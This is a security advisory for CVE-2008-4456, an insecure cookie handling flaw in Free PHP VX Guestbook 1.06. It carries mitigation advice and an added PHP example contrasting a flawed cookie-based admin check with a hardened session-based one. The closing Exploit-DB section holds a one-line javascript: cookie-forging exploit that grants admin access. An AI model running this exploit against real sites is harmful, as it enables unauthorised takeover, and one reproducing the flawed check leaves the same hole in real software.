Vendor: Free PHP VX Guestbook
By: Stack
CVSS: 7.5 (HIGH)
Insecure Cookie Handling
CWE: 200
Product Name: Free PHP VX Guestbook
Affected Version From: 01.06
Affected Version To: 01.06
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: o:free-php-vx-guestbook:free_php_vx_guestbook:1.06
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability

Free PHP VX Guestbook version 1.06 contains an insecure cookie handling vulnerability that allows an attacker to gain administrative access to the guestbook. An attacker can exploit it by setting the admin_name and admin_pass cookies to 1.

Mitigation:

Upgrade to the latest version of Free PHP VX Guestbook.
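
When reviewing the upgrade, or other code suspected of the same pattern, the property to check is that admin state is never derived from cookie values. The following PHP is an added example, not code from Free PHP VX Guestbook or from the original advisory: is_admin_flawed() is a hypothetical check of the kind that would accept the cookies described above, and login(), is_admin_hardened() and the sample credentials are assumed names and constructed values.

```php
<?php
// Added example; not code from Free PHP VX Guestbook (its source is not shown here).

// Hypothetical flawed pattern: admin state is read straight from request cookies.
function is_admin_flawed(array $cookies): bool
{
    // Any non-empty value passes, so admin_name=1 and admin_pass=1 are accepted.
    return !empty($cookies['admin_name']) && !empty($cookies['admin_pass']);
}

// Hardened: check the credentials once, then record the result server-side.
function login(string $user, string $pass, string $adminUser, string $adminHash): bool
{
    // hash_equals() and password_verify() both compare in constant time.
    $ok = hash_equals($adminUser, $user) && password_verify($pass, $adminHash);
    if ($ok) {
        session_regenerate_id(true);   // new session id on privilege change
        $_SESSION['is_admin'] = true;  // lives in server-side session storage
    }
    return $ok;
}

function is_admin_hardened(): bool
{
    // The client only holds an opaque session id; it cannot set this flag.
    return ($_SESSION['is_admin'] ?? false) === true;
}

// Demo with constructed values.
session_start([
    'use_strict_mode' => true,   // reject session ids the server did not issue
    'cookie_httponly' => true,
    'cookie_secure'   => true,
    'cookie_samesite' => 'Strict',
]);
$adminHash = password_hash('constructed-sample-password', PASSWORD_DEFAULT);
$forged    = ['admin_name' => '1', 'admin_pass' => '1'];

$results = [
    'flawed check, forged cookies'   => is_admin_flawed($forged),
    'hardened check, no login'       => is_admin_hardened(),
    'login with forged values'       => login('1', '1', 'admin', $adminHash),
    'login with correct credentials' => login('admin', 'constructed-sample-password', 'admin', $adminHash),
    'hardened check after login'     => is_admin_hardened(),
];
var_dump($results);
```

In the hardened form the browser still carries a cookie, but it holds only the session identifier, so changing cookie values cannot grant the admin flag.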

Exploit-DB raw data:

###############################################################################################
[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
[+] Discovered By Stack                 
[+] Greetz : All my friends
################################################################################################
---
exploit:
javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";

# milw0rm.com [2008-09-14]